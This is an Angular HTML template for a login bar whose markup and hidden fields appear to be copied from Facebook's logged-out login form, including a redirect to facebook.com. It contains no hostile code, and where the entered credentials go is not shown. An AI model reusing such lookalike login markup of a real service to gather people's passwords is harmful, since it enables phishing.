<div class="_li">
  <div id="pagelet_bluebar" data-referrer="pagelet_bluebar">
    <div id="blueBarDOMInspector"><div class="_53jh">
      <div class="loggedout_menubar_container">
        <div class="clearfix loggedout_menubar">
          <div class="lfloat _ohe">
            <h1>
              <a>
                <img src ="../../../assets/images/sss.png">
              </a>
            </h1>
          </div>
          <div class="menu_login_container rfloat _ohf" data-testid="royal_login_form">
            <form id="login_form" name="form" (submit)="f.form.valid && doLogin($event, username.value, password.value)" #f="ngForm" novalidate>
              <input type="hidden" name="lsd" value="AVrh_Al4">
              <table cellspacing="0" role="presentation">
                <tbody>
                <tr>
                  <td class="html7magic">
                    <label for="email">Email</label>
                  </td>
                  <td class="html7magic">
                    <label for="pass">Password</label>
                  </td>
                </tr>
                <tr>
                  <td>
                    <!--<input type="text" class="inputtext" [(ngModel)]="email" name="email" id="email" tabindex="1">-->
                    <!--<input type="text" class="form-control" name="email" [(ngModel)]="model.email" #email="ngModel" required />-->
                    <input #username type="email" type="text"  required>
                    <!--<div *ngIf="f.submitted && !email.valid" class="help-block">Email is required</div>-->
                  </td>
                  <td>
                    <!--<input type="password" class="inputtext" [(ngModel)]="password" name="pass" id="pass" tabindex="2">-->
                    <!--<input type="password" class="form-control" name="password" [(ngModel)]="model.password" #password="ngModel" required />-->
                    <input  #password type="password" pInputText required>
                    <!--<div *ngIf="f.submitted && !password.valid" class="help-block">Password is required</div>-->
                  </td>
                  <td>
                    <!--<label class="uiButton uiButtonConfirm" ng-click="login()" id="loginbutton">Login</label>-->
                    <div class="form-group">
                      <button [disabled]="loading" class="btn btn-primary">Login</button>
                      <img *ngIf="loading" src="data:image/gif;base64,R0lGODlhEAAQAPIAAP///wAAAMLCwkJCQgAAAGJiYoKCgpKSkiH/C05FVFNDQVBFMi4wAwEAAAAh/hpDcmVhdGVkIHdpdGggYWpheGxvYWQuaW5mbwAh+QQJCgAAACwAAAAAEAAQAAADMwi63P4wyklrE2MIOggZnAdOmGYJRbExwroUmcG2LmDEwnHQLVsYOd2mBzkYDAdKa+dIAAAh+QQJCgAAACwAAAAAEAAQAAADNAi63P5OjCEgG4QMu7DmikRxQlFUYDEZIGBMRVsaqHwctXXf7WEYB4Ag1xjihkMZsiUkKhIAIfkECQoAAAAsAAAAABAAEAAAAzYIujIjK8pByJDMlFYvBoVjHA70GU7xSUJhmKtwHPAKzLO9HMaoKwJZ7Rf8AYPDDzKpZBqfvwQAIfkECQoAAAAsAAAAABAAEAAAAzMIumIlK8oyhpHsnFZfhYumCYUhDAQxRIdhHBGqRoKw0R8DYlJd8z0fMDgsGo/IpHI5TAAAIfkECQoAAAAsAAAAABAAEAAAAzIIunInK0rnZBTwGPNMgQwmdsNgXGJUlIWEuR5oWUIpz8pAEAMe6TwfwyYsGo/IpFKSAAAh+QQJCgAAACwAAAAAEAAQAAADMwi6IMKQORfjdOe82p4wGccc4CEuQradylesojEMBgsUc2G7sDX3lQGBMLAJibufbSlKAAAh+QQJCgAAACwAAAAAEAAQAAADMgi63P7wCRHZnFVdmgHu2nFwlWCI3WGc3TSWhUFGxTAUkGCbtgENBMJAEJsxgMLWzpEAACH5BAkKAAAALAAAAAAQABAAAAMyCLrc/jDKSatlQtScKdceCAjDII7HcQ4EMTCpyrCuUBjCYRgHVtqlAiB1YhiCnlsRkAAAOwAAAAAAAAAAAA==" />
                      <!--<a [routerLink]="['/register']" class="btn btn-link">Register</a>-->
                    </div>
                  </td>
                </tr>
                <tr>
                  <td class="login_form_label_field"></td>
                  <td class="login_form_label_field">
                    <div style="margin-top: -20px;">
                      <a ui-sref="resetPassword" (click)="forgotPassword()" data-testid="forgot_account_link">Forgotten account?</a>
                    </div>
                  </td>
                </tr>
                </tbody>
              </table>
              <input type="hidden" autocomplete="off" name="timezone" value="-330" id="u_0_v">
              <input type="hidden" autocomplete="off" name="lgndim" value="eyJ3IjoxMjgwLCJoIjo4MDAsImF3IjoxMjgwLCJhaCI6NzE2LCJjIjoyNH0=" id="u_0_w">
              <input type="hidden" name="lgnrnd" value="021938_f-EW">
              <input type="hidden" id="lgnjs" name="lgnjs" value="1492075181">
              <input type="hidden" autocomplete="off" name="ab_test_data" value="">
              <input type="hidden" autocomplete="off" id="locale" name="locale" value="en_GB">
              <input type="hidden" autocomplete="off" name="next" value="https://www.facebook.com/">
              <input type="hidden" autocomplete="off" name="login_source" value="login_bluebar">
            </form>
            <!--<ul class="nav navbar-nav">-->
            <!--<li class="nav_imp dropdown hasmenu yamm-half"><a ui-sref="user.dashboardProfile" ui-sref-active="nav_active">Profile</a></li>-->
            <!--<li class="nav_imp dropdown hasmenu yamm-half" style="padding: 0px;"><a ui-sref="user.dashboardAccount" ui-sref-active="nav_active">Account</a></li>-->
            <!--<li class="nav_imp dropdown hasmenu yamm-half" style="padding: 0px;"><a ui-sref="user.dashboardLogout" ui-sref-active="nav_active">Logout</a></li>-->
            <!--</ul>-->
          </div>
        </div>
      </div>
    </div>
    </div>
  </div>
</div>
